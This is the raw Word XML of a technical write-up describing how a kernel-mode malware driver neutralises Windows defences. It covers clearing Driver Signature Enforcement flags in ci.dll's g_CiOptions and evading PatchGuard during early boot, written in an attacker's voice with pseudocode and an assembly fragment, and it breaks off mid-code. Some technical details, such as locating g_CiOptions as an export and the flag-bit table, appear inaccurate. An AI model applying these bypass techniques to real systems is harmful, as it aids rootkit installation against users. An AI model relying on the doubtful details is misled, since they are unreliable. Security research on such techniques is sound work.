    <w:p w14:paraId="2813AC2A" w14:textId="77777777" w:rsidR="00E85008" w:rsidRDefault="00E85008" w:rsidP="00E85008">
      <w:pPr>
        <w:ind w:left="14" w:right="1767"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E85008">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">2.2 Phase Two: Kernel Payload Injection &amp; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E85008">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Defense</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E85008">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> Neutralization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F94DB48" w14:textId="77777777" w:rsidR="00E85008" w:rsidRDefault="00E85008" w:rsidP="00E85008">
      <w:pPr>
        <w:ind w:left="14" w:right="1767"/>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E85008">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>After the malware driver is stored in the kernel memory and is running with Ring 0 privileges, it has to fight against the kernel, level security of Windows. The second phase of the malware selectively disables certain protections while keeping the operating system stable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="424CF71F" w14:textId="1CAD37F1" w:rsidR="00E85008" w:rsidRDefault="00E85008" w:rsidP="00E85008">
      <w:pPr>
        <w:ind w:left="14" w:right="1767"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E85008">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>2.2.1 Driver Signature Enforcement (DSE): ci.dll Bypass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E694905" w14:textId="021387CA" w:rsidR="00FC7A97" w:rsidRDefault="00E85008" w:rsidP="00E85008">
      <w:pPr>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r w:rsidRPr="00E85008">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">The Protection: </w:t>
      </w:r>
      <w:r w:rsidRPr="00E85008">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>Windows ci.dll (Code Integrity) is the component that ensures that every kernel, mode driver is digitally signed by checking the signature before the driver is loaded. This stops the execution of unsigned drivers or drivers created by an attacker in the kernel</w:t>
      </w:r>
      <w:r w:rsidR="00000000">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58232C11" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="3"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">The Vulnerability: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">The signature check is performed by reading the global variable </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>g_CiOptions</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>ci.dll</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. This variable controls the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>behavior</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> of the code integrity checks:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid0"/>
        <w:tblW w:w="4342" w:type="dxa"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1241"/>
        <w:gridCol w:w="3101"/>
      </w:tblGrid>
      <w:tr w:rsidR="00FC7A97" w14:paraId="4E30FCF5" w14:textId="77777777" w:rsidTr="00AD5226">
        <w:trPr>
          <w:trHeight w:val="342"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1241" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="585E6DB4" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Flag Bit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3101" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="39A370F3" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Meaning</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FC7A97" w14:paraId="3DC0681D" w14:textId="77777777" w:rsidTr="00AD5226">
        <w:trPr>
          <w:trHeight w:val="287"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1241" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4865254F" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>0x00000001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3101" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6B552D86" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Enable CODEINTEGRITY checks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FC7A97" w14:paraId="68A6A52E" w14:textId="77777777" w:rsidTr="00AD5226">
        <w:trPr>
          <w:trHeight w:val="239"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1241" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1966F2E2" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>0x00000002</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3101" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1D80937B" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Enable DRIVER_SIGNING checks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FC7A97" w14:paraId="46DE1D3C" w14:textId="77777777" w:rsidTr="00AD5226">
        <w:trPr>
          <w:trHeight w:val="239"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1241" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5C1BCB32" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>0x00000004</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3101" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="314F362D" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>TEST-SIGNING mode</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FC7A97" w14:paraId="72257704" w14:textId="77777777" w:rsidTr="00AD5226">
        <w:trPr>
          <w:trHeight w:val="295"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1241" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="52146C2D" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>0x00000008</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3101" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7486CAF8" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Reserved</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2253B616" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:t>By clearing bits 0x00000001 and 0x00000002, the driver can operate in an environment where all DSE checks are disabled.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="007D378C" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="126" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="22" w:right="1471" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>The Exploitation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC8A942" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="4" w:line="258" w:lineRule="auto"/>
        <w:ind w:left="22" w:right="0" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:color w:val="61A1B0"/>
        </w:rPr>
        <w:t xml:space="preserve">// Pseudocode: DSE Bypass via </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:color w:val="61A1B0"/>
        </w:rPr>
        <w:t>g_CiOptions</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:color w:val="61A1B0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Modification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53123A0B" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="3" w:line="260" w:lineRule="auto"/>
        <w:ind w:left="22" w:right="0" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">PULONG </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>g_CiOptions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FindExport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="4070A1"/>
        </w:rPr>
        <w:t>"ci.dll"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="4070A1"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="4070A1"/>
        </w:rPr>
        <w:t>g_CiOptions</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="4070A1"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D49A0F8" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="121" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="27" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>g_CiOptions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&amp;= </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>~(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="40A170"/>
        </w:rPr>
        <w:t xml:space="preserve">0x00000001 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t xml:space="preserve">| </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="40A170"/>
        </w:rPr>
        <w:t>0x00000002</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t xml:space="preserve">); </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:color w:val="61A1B0"/>
        </w:rPr>
        <w:t>// Clear DSE flags</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB1364B" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Why this works: </w:t>
      </w:r>
      <w:r>
        <w:t>The vulnerability is not a programming error but a consequence of the trust model. The kernel trusts code executing in Ring 0, assuming it is vetted through the boot chain. By injecting code before integrity checks begin, we bypass the very mechanism designed to prevent injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="057C99D1" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="274"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Key observation: </w:t>
      </w:r>
      <w:r>
        <w:t>This is not a “bug” in ci.dll—it’s a consequence of where the code runs. Once Ring 0 execution is achieved (via bootloader injection), all software-based signature checks become moot because we are running at the level of privilege that would be performing those checks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18258DBE" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="112" w:line="261" w:lineRule="auto"/>
        <w:ind w:left="22" w:right="1708" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>2.2.2 Kernel Patch Protection (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>PatchGuard</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>/KPP): Timing Exploitation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>The</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> Protection: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PatchGuard</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (KPP - Kernel Patch Protection), introduced in Windows Vista x64, periodically verifies critical kernel structures:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73BB68F1" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="4"/>
        <w:ind w:right="1767" w:hanging="255"/>
      </w:pPr>
      <w:r>
        <w:t>Interrupt Descriptor Table (IDT)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B5EB38" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="4"/>
        <w:ind w:right="1767" w:hanging="255"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>System Service Dispatch Table (SSDT)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="190DC559" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="4"/>
        <w:ind w:right="1767" w:hanging="255"/>
      </w:pPr>
      <w:r>
        <w:t>Model Specific Registers (MSRs)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4058A081" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:right="1767" w:hanging="255"/>
      </w:pPr>
      <w:r>
        <w:t>Kernel Module List</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23123F0B" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:t>If tampering is detected, the system initiates a kernel panic (BSOD).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E095C18" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">The Vulnerability: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PatchGuard</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> has a limited window during system initialization where it has not yet begun its verification cycles. Additionally, modern versions focus verification on kernel-wide structures but are less aggressive about monitoring individual process memory spaces.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="181EC90E" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="126" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="22" w:right="1471" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Two-Pronged Strategy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7013EABC" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="22" w:right="1471" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Strategy 1: Execution During </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>PatchGuard</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> Initialization Blackout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47212788" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="5"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The payload executes its critical modifications during </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>KiSystemStartup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>before</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF66259" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>KiInitializeBootProcessor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">completes, when </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PatchGuard</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> callbacks have not yet been registered.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5027D748" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="4" w:line="258" w:lineRule="auto"/>
        <w:ind w:left="22" w:right="2615" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:color w:val="61A1B0"/>
        </w:rPr>
        <w:t xml:space="preserve">; Kernel boot code provides a brief window </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="05297D"/>
        </w:rPr>
        <w:t>KiSystemStartup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="05297D"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="237AD507" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="3" w:line="260" w:lineRule="auto"/>
        <w:ind w:left="455" w:right="0" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A4B284A" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:line="260" w:lineRule="auto"/>
        <w:ind w:left="455" w:right="1778" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="007021"/>
        </w:rPr>
        <w:t xml:space="preserve">call </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>KiInitializeBootProcessor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:color w:val="61A1B0"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>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PatchGuard</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
